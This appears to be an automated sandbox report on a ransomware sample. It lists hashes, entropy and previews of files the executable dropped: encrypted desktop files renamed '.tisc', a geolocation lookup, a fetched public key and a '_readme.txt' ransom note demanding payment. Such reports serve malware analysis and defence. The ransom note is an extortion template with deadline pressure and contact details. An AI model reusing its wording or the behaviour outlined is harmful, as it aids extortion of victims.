                                                                                    C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    Process:C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):833536
                                                                                    Entropy (8bit):7.776107857840815
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:KxrffFxEHP0VOTfvvQfDDkuM5glE15y4EXJUnrAtHbVzxp6L:K19xw0V6n4LLM5glE15HcJoABd36L
                                                                                    MD5:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    SHA1:F6A71793288CC09397B262FBA8FC38B29073A44E
                                                                                    SHA-256:0D977E55742460C71884D6040178FC8C7ABF8C97136B6293DA37CBF9C59B6778
                                                                                    SHA-512:ECED75D02B832BF68657835F1EF194AC39C04A806951F2D48F33AB5722804FDC0A8530507761C1DC0E2696D6DC8523A60541895E44EAC3B886C288CCC4F21A45
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 56%
                                                                                    Reputation:unknown
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L...2.W_.................`...........F.......p....@....................................................................O...,...(....... ............................r..............................`...@............p...............................text....`.......`.................. ..`.rdata...Y...p...Z...d..............@..@.data............&..................@....rsrc... ...........................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe:Zone.Identifier
                                                                                    Process:C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Reputation:unknown
                                                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\geo[1].json
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):447
                                                                                    Entropy (8bit):4.677584706717842
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:YZIW6wpHEx6uVRTQVJQjRb8EQVt7YIRwIyFp3m9KLP2JSzYpuX4n:YXHDqRTQVJQjRb8EQVt7YIu1Dm9Kr2cw
                                                                                    MD5:74DE26126E31B2DCD1B740436D5F6C3D
                                                                                    SHA1:A599DC5836F7E77AD8D21636EA2542C5E7528854
                                                                                    SHA-256:F08427BBE80D2D3C03A7FA644B4E22D120640856D858E76F69CAACD124560F28
                                                                                    SHA-512:4AF41C7541E1554FFD1F5B1863227958181E7E5C34F38C37A2D8547F1B760B73F8D7B975D0F1ABD56055E9E5D4E3A43D8FF16135D847EA871A0A2AF11EDDCB6B
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: {"ip":"102.129.143.57","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Virginia","region_rus":"\u0412\u0438\u0440\u0433\u0438\u043d\u0438\u044f","region_ua":"\u0412\u0456\u0440\u0433\u0456\u043d\u0456\u044f","city":"Reston","city_rus":"\u0420\u0435\u0441\u0442\u043e\u043d","latitude":"38.96872","longitude":"-77.3411","zip_code":"20190","time_zone":"-04:00"}
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\get[1].htm
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):558
                                                                                    Entropy (8bit):6.01499008069915
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:YGJ68pFAISpgM26GIFJUDoaWm5CFgC31wUZXmNKM57B:YgJpGI89FJFarQvx2UMhB
                                                                                    MD5:44826762375626B4DBC29A65879173F7
                                                                                    SHA1:46D373B493EB8070FEF5FC6CE7FD65DF44A28580
                                                                                    SHA-256:8A91D4610515779C84F6715AD364786816169427C5D77E0D8B36F484E057D16C
                                                                                    SHA-512:CA70474751DEF7A3FECE1D5BD2EDA70381D7CBECAF9413300A010741F9F8EE84F9F7B3149F542C7FB23A179D0514A81E775B57FC74F0DF8616D6A4D8F5031BEB
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: {"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0VZ5848t+jS6gWIFkIWO\\nJOTEE8+EjZ46c\/\/357Hyjm4Frkcx4eaC9jj4GlZYr25XegsYtAHFzzfWhg0LsSdR\\nNbZsIK5lBV0DJvy568UEsnQajc6H4btl\/7ah5RSLGjlnaBCu0jk+KhWKuAJAIV3r\\noHXqTaBkO5x6i+e4R41Mpj8kXuYPgErF1TJXUmHMiWcYMn3xmXCnqT3\/VTx4dFVA\\nsYCZX+Z0uAyDBu+pDM4sJGq6kEEoXVpLFFmLPXdLPnuJt2rLzZOoJuUOOz169VDL\\noLx6UoLP5yOu1IHgZM3fSKnm3FybftQwl2P95g3+46Ico0ewR7gMCy3gRS5TXEF6\\nzQIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw"}
                                                                                    C:\Users\user\AppData\Local\VirtualStore\_readme.txt
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1110
                                                                                    Entropy (8bit):4.877671780222618
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuW2mFRqrl3W4kA+GT/kF5M2/k/rAXTJhy:WZHfv0p6W2PFWrDGT0f/k/4u
                                                                                    MD5:63EC47014492996F7809A1D7CC88DD90
                                                                                    SHA1:C6F22DD4060A48F26ED971CAFABA6A2E296D2D88
                                                                                    SHA-256:371EED226E88A1C1E4A129581F873F72A0BDC68985EB38A07353A7201113D276
                                                                                    SHA-512:2299D7814D0A2772DE23DBABF16D45A35D40174429F0B756CE1F3E56869F20BDA4BC708F51905CC72FE8F96CDC37E969E07C2BAA14A2990E4CF16121BE346281
                                                                                    Malicious:true
                                                                                    Reputation:unknown
                                                                                    Preview: ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-1JwFK5rT39..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..manager@mailtemp.ch....Reserve e-mail address to
                                                                                    C:\Users\user\AppData\Local\bowsakkdestx.txt
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):558
                                                                                    Entropy (8bit):6.01499008069915
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:YGJ68pFAISpgM26GIFJUDoaWm5CFgC31wUZXmNKM57B:YgJpGI89FJFarQvx2UMhB
                                                                                    MD5:44826762375626B4DBC29A65879173F7
                                                                                    SHA1:46D373B493EB8070FEF5FC6CE7FD65DF44A28580
                                                                                    SHA-256:8A91D4610515779C84F6715AD364786816169427C5D77E0D8B36F484E057D16C
                                                                                    SHA-512:CA70474751DEF7A3FECE1D5BD2EDA70381D7CBECAF9413300A010741F9F8EE84F9F7B3149F542C7FB23A179D0514A81E775B57FC74F0DF8616D6A4D8F5031BEB
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: {"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0VZ5848t+jS6gWIFkIWO\\nJOTEE8+EjZ46c\/\/357Hyjm4Frkcx4eaC9jj4GlZYr25XegsYtAHFzzfWhg0LsSdR\\nNbZsIK5lBV0DJvy568UEsnQajc6H4btl\/7ah5RSLGjlnaBCu0jk+KhWKuAJAIV3r\\noHXqTaBkO5x6i+e4R41Mpj8kXuYPgErF1TJXUmHMiWcYMn3xmXCnqT3\/VTx4dFVA\\nsYCZX+Z0uAyDBu+pDM4sJGq6kEEoXVpLFFmLPXdLPnuJt2rLzZOoJuUOOz169VDL\\noLx6UoLP5yOu1IHgZM3fSKnm3FybftQwl2P95g3+46Ico0ewR7gMCy3gRS5TXEF6\\nzQIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw"}
                                                                                    C:\Users\user\Desktop\BJZFPPWAPT.mp3
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.828171320127576
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:RlEZdniOynGNPRtXBZ4nZpEA+eeNSYc0K4juk2LdNYMEUypI8+YgbD:RYd5yERo4vjuk2Ldq/Uyq8aD
                                                                                    MD5:97421E17476C74D65293BA575200BAF5
                                                                                    SHA1:EA0B56169661261D6681C731E96C979449CAD37A
                                                                                    SHA-256:7844EEC73F4FDF34D43C38EEE6CAA8ED8024D97B27A74C6E66B872774C0DF96B
                                                                                    SHA-512:5B9BBF78FE37DE4AC4E89DE9971F1715AE07695DE4235CA7C1B57E95AC0736C0452D7D132F6E4D828B87E8E3CD7A4FD9E58BA83E8D7A2C2C502CF4741EA182EC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: Mom3Z..V'.......VJ.,.....vpL...=?.w......%..b.{.u.R...Z.........gcjt.SN....].{..t..b...&}T.1_3.b...CM.O....D..f.8.&......."k.........d.hMW0....$f.....%..q..W.....(.k...[{W.~-U.B@+.P.a.V...+........p..W.~%@...b..h..Xb2=d..G..:B..e$..@.,.'...7...z.gG...X..o.....t.X`6s.C...!49CL..[z...._..(..&..MB,..O.C....W~...G$&E...i9..4...&........0.....UvX.@jY...kc..A..7.S...E.Zs...$9..W...i.Mk..V<..D.eL.|^...{........8..Y-|.}......F}..("..M.K......p.%.?$a].i...x.G...:c..S...|.1[....6......6'.3...._m...)..F.",pm..5..J..`.L..={\ .Yg[.;..Y........a.-.a?{..O............../|.w.~.q4..2..KN.....&..a..g6.....s..........f.&..a/....K.W.....OZ_..."..O2..+...(.l.kmi..6rT...Y=.i'.<...........y....U...h...d`'....`%^.^.....4.qvY.$..k.nI=..&.......1....i......`.2`...%.Kg....._{Pbc%.4.".w=.....yI.0....3.....(...].{\......&..'.M?.........c.`2.g.Y.j....i....iub.b....W... ...}.g...J:N..C.......H158.}..*......O.,..i_......6\.....|..R...dI.4,..T.@....vLw.. 8ZSSFvs..N..
                                                                                    C:\Users\user\Desktop\BJZFPPWAPT.mp3.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.828171320127576
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:RlEZdniOynGNPRtXBZ4nZpEA+eeNSYc0K4juk2LdNYMEUypI8+YgbD:RYd5yERo4vjuk2Ldq/Uyq8aD
                                                                                    MD5:97421E17476C74D65293BA575200BAF5
                                                                                    SHA1:EA0B56169661261D6681C731E96C979449CAD37A
                                                                                    SHA-256:7844EEC73F4FDF34D43C38EEE6CAA8ED8024D97B27A74C6E66B872774C0DF96B
                                                                                    SHA-512:5B9BBF78FE37DE4AC4E89DE9971F1715AE07695DE4235CA7C1B57E95AC0736C0452D7D132F6E4D828B87E8E3CD7A4FD9E58BA83E8D7A2C2C502CF4741EA182EC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: Mom3Z..V'.......VJ.,.....vpL...=?.w......%..b.{.u.R...Z.........gcjt.SN....].{..t..b...&}T.1_3.b...CM.O....D..f.8.&......."k.........d.hMW0....$f.....%..q..W.....(.k...[{W.~-U.B@+.P.a.V...+........p..W.~%@...b..h..Xb2=d..G..:B..e$..@.,.'...7...z.gG...X..o.....t.X`6s.C...!49CL..[z...._..(..&..MB,..O.C....W~...G$&E...i9..4...&........0.....UvX.@jY...kc..A..7.S...E.Zs...$9..W...i.Mk..V<..D.eL.|^...{........8..Y-|.}......F}..("..M.K......p.%.?$a].i...x.G...:c..S...|.1[....6......6'.3...._m...)..F.",pm..5..J..`.L..={\ .Yg[.;..Y........a.-.a?{..O............../|.w.~.q4..2..KN.....&..a..g6.....s..........f.&..a/....K.W.....OZ_..."..O2..+...(.l.kmi..6rT...Y=.i'.<...........y....U...h...d`'....`%^.^.....4.qvY.$..k.nI=..&.......1....i......`.2`...%.Kg....._{Pbc%.4.".w=.....yI.0....3.....(...].{\......&..'.M?.........c.`2.g.Y.j....i....iub.b....W... ...}.g...J:N..C.......H158.}..*......O.,..i_......6\.....|..R...dI.4,..T.@....vLw.. 8ZSSFvs..N..
                                                                                    C:\Users\user\Desktop\BNAGMGSPLO.mp3
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.864579731248268
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:7er8yfPy7QUKb4W1aqczHsVJj2U4WbQVIclJdb+HR3XisSubGhRL3akPT+q6gbD:7ednykpb4W1aqOMVcJxlJdYsUMRL3/Pn
                                                                                    MD5:25070161EEF7119789B374ADED51372B
                                                                                    SHA1:C43F607BB8F799015260C62EFD35B607C725705D
                                                                                    SHA-256:C3095018CCD3EFE81AAD07D4DDA9C5ABE5117865438E482D6ED9AEBA33E159F4
                                                                                    SHA-512:A84F649E50389247323627FA80F4BF305FE70EDAA1EEA6C76316F5A7A018188F151F889C0668066973F552DE47BED54C9A8AEB622AE2CD7409449D91CFDB35A7
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ,.p...s..U.1....H.-.X...N.m..^..t...O...)....N.rJ...i.lZ{#.kv..Bd...l$.0..L..........9.I.x5......j.J.....Y..g...x.i./../'..rx...~..bj.."...`.{....._1I..;.[&...{.#=.....r..RHI...d..j..h.nSe..\E&.A.^8q.R9...W"?...2.F....Z-WA.CY..SY..O.T..@;%:\..Fb..%.T..Q..z..=*..eD.\.Wo.).m.j....r.,.Q.e.[.=].8.UQ.....o.....@Ks.9@\bAJ....x..@......[.9...U[.\".sr...O7.....n+.t......&....EmS.......`h......cL)..co..ba..9..>..:O.a8....o..|....e7.ev.GNG-..4J..T.......=||p.m.Xr/.s.......^L.;"~.r.@.v.eq...D.jnB.....A....W...b.^.?.$.9y.x.Fi.Es...ly..o.r..7...)..X...L...e...S......u......J.H?.ly..}!Z.PWy..,.}-....f....MF...;C..?.Pi.".z.d..K..*.......u...l...,L...;Q).+@n.J.......b. O.....O^.,..|;;U.........h@c(...1b!N....l.^Fi..-H........f=.DC.)0..H.......(.XLil 0.......4...|..g..P.Y..B.....~....."..M..O%....GH>...G.......i[.s...Y....c.v:.J...N.....:..W..Y.L..XS............o.6.;.E./.]#x..7.&.A..3...4...E..;...\$.........S1\._..~.Ejz..bA.faUb...mo.H..
                                                                                    C:\Users\user\Desktop\BNAGMGSPLO.mp3.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.864579731248268
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:7er8yfPy7QUKb4W1aqczHsVJj2U4WbQVIclJdb+HR3XisSubGhRL3akPT+q6gbD:7ednykpb4W1aqOMVcJxlJdYsUMRL3/Pn
                                                                                    MD5:25070161EEF7119789B374ADED51372B
                                                                                    SHA1:C43F607BB8F799015260C62EFD35B607C725705D
                                                                                    SHA-256:C3095018CCD3EFE81AAD07D4DDA9C5ABE5117865438E482D6ED9AEBA33E159F4
                                                                                    SHA-512:A84F649E50389247323627FA80F4BF305FE70EDAA1EEA6C76316F5A7A018188F151F889C0668066973F552DE47BED54C9A8AEB622AE2CD7409449D91CFDB35A7
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ,.p...s..U.1....H.-.X...N.m..^..t...O...)....N.rJ...i.lZ{#.kv..Bd...l$.0..L..........9.I.x5......j.J.....Y..g...x.i./../'..rx...~..bj.."...`.{....._1I..;.[&...{.#=.....r..RHI...d..j..h.nSe..\E&.A.^8q.R9...W"?...2.F....Z-WA.CY..SY..O.T..@;%:\..Fb..%.T..Q..z..=*..eD.\.Wo.).m.j....r.,.Q.e.[.=].8.UQ.....o.....@Ks.9@\bAJ....x..@......[.9...U[.\".sr...O7.....n+.t......&....EmS.......`h......cL)..co..ba..9..>..:O.a8....o..|....e7.ev.GNG-..4J..T.......=||p.m.Xr/.s.......^L.;"~.r.@.v.eq...D.jnB.....A....W...b.^.?.$.9y.x.Fi.Es...ly..o.r..7...)..X...L...e...S......u......J.H?.ly..}!Z.PWy..,.}-....f....MF...;C..?.Pi.".z.d..K..*.......u...l...,L...;Q).+@n.J.......b. O.....O^.,..|;;U.........h@c(...1b!N....l.^Fi..-H........f=.DC.)0..H.......(.XLil 0.......4...|..g..P.Y..B.....~....."..M..O%....GH>...G.......i[.s...Y....c.v:.J...N.....:..W..Y.L..XS............o.6.;.E./.]#x..7.&.A..3...4...E..;...\$.........S1\._..~.Ejz..bA.faUb...mo.H..
                                                                                    C:\Users\user\Desktop\BNAGMGSPLO.pdf
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.819809934195165
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:zQDuUjnhEVxA6hBnhL4nE8J+YDyL2jrDWpkHxG6luEiaJSg9z4m0wSTlgbD:zQ6UrhGG249+7KrKWGKSgp4m0wvD
                                                                                    MD5:6AE6DD83461E9450D7E44D3FE42563D1
                                                                                    SHA1:31FCC32B2DAD69DC4CBEB0F761B757A2E23BB6EB
                                                                                    SHA-256:EDF92B507A3357D0A95964D9B9AF7819C005CEF9E969FEAB183CF030967C0F0F
                                                                                    SHA-512:1AD3C3326FA73AD6E3864FD416F7E8B1A05FBEC1B980B0A1CFC541B5D6B408835E2F8006344B0B9C70B8AE92A48FC71BA298CD0F05E47E1A7313794EA2F3A6B4
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..V.V|...s....}.J'NL.OZ.F....P....5..HA...........n.B.O.u......._W.{gd...nV.lI........:IE...R.d.!.:....~l....=.6........Zj....10.bK.i......F.g..7..L.zw.`.JL.p...;.s#.k....U.f[.!._..F...91....>^>].x...'e.V".s2.6..sD..E...ho*'..C/.k..%&.%v..:."..Dc.>..C.$..bTLA1.s8u=SS..\....g...."...).j...N.i..2.'.&.^.........lI9.^9.....8.+\>.S.!.ka.8.......K.g#+..,P+.ynm..."(k...=_.....g.m.\..PH.xaR..K..%~.Pg......e...p..h...4.l...;..`Zr.h.z.2.( U....[_...=q...~F..z ....|.-.^'.|_.nC....x.C...........t.>..x.6.K.~D.C..}!...t./M...Kqzz.....@...E..0..C:.....>d..Uk.o%8.9ML.!...a......,T...=V.G.._.1.....2.dp.O.9...9..w^.....1R.CY.5......(9..N...n..i.....6.I<DY...7.fn.....h.....8..FM9P>h.[.Z,5.BS.......*P.^...8..#....J.BH..w...ni.......c}o...o..O0.dP.1...n.....N..b..t...=.!./.!.,~k.Q.X.y...TL........8..4..^...!.../v|..%.8.....j....W......:&?^B....[S:.w.2$w.f...^.J...o....:......ie..3?M.......... ...P^T1.f.kP.}..d..-.../..E.\0P".sQ.C....q..I..MR.j..X>.n......G.1
                                                                                    C:\Users\user\Desktop\BNAGMGSPLO.pdf.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.819809934195165
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:zQDuUjnhEVxA6hBnhL4nE8J+YDyL2jrDWpkHxG6luEiaJSg9z4m0wSTlgbD:zQ6UrhGG249+7KrKWGKSgp4m0wvD
                                                                                    MD5:6AE6DD83461E9450D7E44D3FE42563D1
                                                                                    SHA1:31FCC32B2DAD69DC4CBEB0F761B757A2E23BB6EB
                                                                                    SHA-256:EDF92B507A3357D0A95964D9B9AF7819C005CEF9E969FEAB183CF030967C0F0F
                                                                                    SHA-512:1AD3C3326FA73AD6E3864FD416F7E8B1A05FBEC1B980B0A1CFC541B5D6B408835E2F8006344B0B9C70B8AE92A48FC71BA298CD0F05E47E1A7313794EA2F3A6B4
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..V.V|...s....}.J'NL.OZ.F....P....5..HA...........n.B.O.u......._W.{gd...nV.lI........:IE...R.d.!.:....~l....=.6........Zj....10.bK.i......F.g..7..L.zw.`.JL.p...;.s#.k....U.f[.!._..F...91....>^>].x...'e.V".s2.6..sD..E...ho*'..C/.k..%&.%v..:."..Dc.>..C.$..bTLA1.s8u=SS..\....g...."...).j...N.i..2.'.&.^.........lI9.^9.....8.+\>.S.!.ka.8.......K.g#+..,P+.ynm..."(k...=_.....g.m.\..PH.xaR..K..%~.Pg......e...p..h...4.l...;..`Zr.h.z.2.( U....[_...=q...~F..z ....|.-.^'.|_.nC....x.C...........t.>..x.6.K.~D.C..}!...t./M...Kqzz.....@...E..0..C:.....>d..Uk.o%8.9ML.!...a......,T...=V.G.._.1.....2.dp.O.9...9..w^.....1R.CY.5......(9..N...n..i.....6.I<DY...7.fn.....h.....8..FM9P>h.[.Z,5.BS.......*P.^...8..#....J.BH..w...ni.......c}o...o..O0.dP.1...n.....N..b..t...=.!./.!.,~k.Q.X.y...TL........8..4..^...!.../v|..%.8.....j....W......:&?^B....[S:.w.2$w.f...^.J...o....:......ie..3?M.......... ...P^T1.f.kP.}..d..-.../..E.\0P".sQ.C....q..I..MR.j..X>.n......G.1
                                                                                    C:\Users\user\Desktop\EEGWXUHVUG.jpg
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.826660062016662
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:CsZKlPIfTIDTU3KPyKF7FtVVDhngtRzwa4p9r/IHhjGWMyYZ0gbD:CdsEDwPKZnVxlgtRzwdgyWdUD
                                                                                    MD5:B1EBAC5F7A0A6E78AEDBC995CF780DF5
                                                                                    SHA1:9AC314655E145C09CAA4FC42040DF7E846959F0C
                                                                                    SHA-256:339D7462D326FAA00203DFFC1D4C5BAA6DA160AA36FAA5A1F1F8A746721206A7
                                                                                    SHA-512:1DB61CDCE4A81370DDC3B8B80C8F175492DDE25E6E7645285BFF47851A983679155BD5CB7FD42840A9A47A9283EC4B356DBDD7A5E51411FD90E771F369897D93
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ......Qi.....(...FCd{q...].~.`.p....6E....R)...Lm..R.......q.OB..3..j.(....XT.*......*...w...L..a.A....K..;......bn...7.:..M..K.)E.ah...6n....0.M.F..y...nvi....7>..:.....\".DhA\.........G.....D..;V....Ma.....~.Y.b}......2.."dg`B.S....;.....K.:..~...t...I.7..m.......t..UKl....:..,M..X. .S..<I.s.M...t..2H.;*....+=N?n....~;..w....6G#.L/....0.f.k..ku.`.%.65.h!......pD.......-1v{.Miw..2.(.,.[...."4.)...a^T..l.@..DI...cg....J.5=..._.h.IU.....=LSn.xL.&g..K.va...MK...3=..:.m.....D..re`.F.M...oV_.<.D...n..R.#.O.*..[..h...@.>..>_............6W......SL..v....H..}.....f!....=..-..y.V$.ou...L..S.S9?.I..:.;%...\;nR].w..w..~..Q.}=)..#..}.9..#..Pj.>q..pN.Q.u.J..Ir.<..*....$.eS.X..~.b..:.N....a.V...yW....@.@.n.({e..E...lx....3.....+.H..A....x.M(.i..|{.._%.C.M..D"L.-.Kq.V.....2=f.......W.......E...m.OmF....w....Mz.c.k."..\...~`#....-m.C....D...."..5..\v..t...?...S.rDp<.7R..%.I&.......>L.......,.c.V.#...L...~.+-L...0...LC.c.?...=.i.. Lj.h.p..].#.....y.9.Z.6f2.
                                                                                    C:\Users\user\Desktop\EEGWXUHVUG.jpg.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.826660062016662
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:CsZKlPIfTIDTU3KPyKF7FtVVDhngtRzwa4p9r/IHhjGWMyYZ0gbD:CdsEDwPKZnVxlgtRzwdgyWdUD
                                                                                    MD5:B1EBAC5F7A0A6E78AEDBC995CF780DF5
                                                                                    SHA1:9AC314655E145C09CAA4FC42040DF7E846959F0C
                                                                                    SHA-256:339D7462D326FAA00203DFFC1D4C5BAA6DA160AA36FAA5A1F1F8A746721206A7
                                                                                    SHA-512:1DB61CDCE4A81370DDC3B8B80C8F175492DDE25E6E7645285BFF47851A983679155BD5CB7FD42840A9A47A9283EC4B356DBDD7A5E51411FD90E771F369897D93
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ......Qi.....(...FCd{q...].~.`.p....6E....R)...Lm..R.......q.OB..3..j.(....XT.*......*...w...L..a.A....K..;......bn...7.:..M..K.)E.ah...6n....0.M.F..y...nvi....7>..:.....\".DhA\.........G.....D..;V....Ma.....~.Y.b}......2.."dg`B.S....;.....K.:..~...t...I.7..m.......t..UKl....:..,M..X. .S..<I.s.M...t..2H.;*....+=N?n....~;..w....6G#.L/....0.f.k..ku.`.%.65.h!......pD.......-1v{.Miw..2.(.,.[...."4.)...a^T..l.@..DI...cg....J.5=..._.h.IU.....=LSn.xL.&g..K.va...MK...3=..:.m.....D..re`.F.M...oV_.<.D...n..R.#.O.*..[..h...@.>..>_............6W......SL..v....H..}.....f!....=..-..y.V$.ou...L..S.S9?.I..:.;%...\;nR].w..w..~..Q.}=)..#..}.9..#..Pj.>q..pN.Q.u.J..Ir.<..*....$.eS.X..~.b..:.N....a.V...yW....@.@.n.({e..E...lx....3.....+.H..A....x.M(.i..|{.._%.C.M..D"L.-.Kq.V.....2=f.......W.......E...m.OmF....w....Mz.c.k."..\...~`#....-m.C....D...."..5..\v..t...?...S.rDp<.7R..%.I&.......>L.......,.c.V.#...L...~.+-L...0...LC.c.?...=.i.. Lj.h.p..].#.....y.9.Z.6f2.
                                                                                    C:\Users\user\Desktop\EFOYFBOLXA.png
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.854455374705948
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ymBuuF4Q2ciBlRTZ8oEd/L/0+2otKg3eB5HYCr/IvF5TwRuwgbD:ymBpFScQf8b/bDtYf4C0t5Tw0pD
                                                                                    MD5:FCFABE73CAE8A504A286968A73AD1A44
                                                                                    SHA1:C8A6179CEB57740A57320045ABB704399D0E2789
                                                                                    SHA-256:7C8F29A0A1870C05CF5D5A74EBBB934843EF3DB901840C68300B583DDAEA9892
                                                                                    SHA-512:8943D8E8D05DB769ACE62AA5B8F935516F5D9CEA459D10043C15CFF403D10962B90DB64F6BD88FE38C14EA63086D93F2CE8C06771F39D081978E8BCB661EAC01
                                                                                    Malicious:false
                                                                                    Reputation:unknown
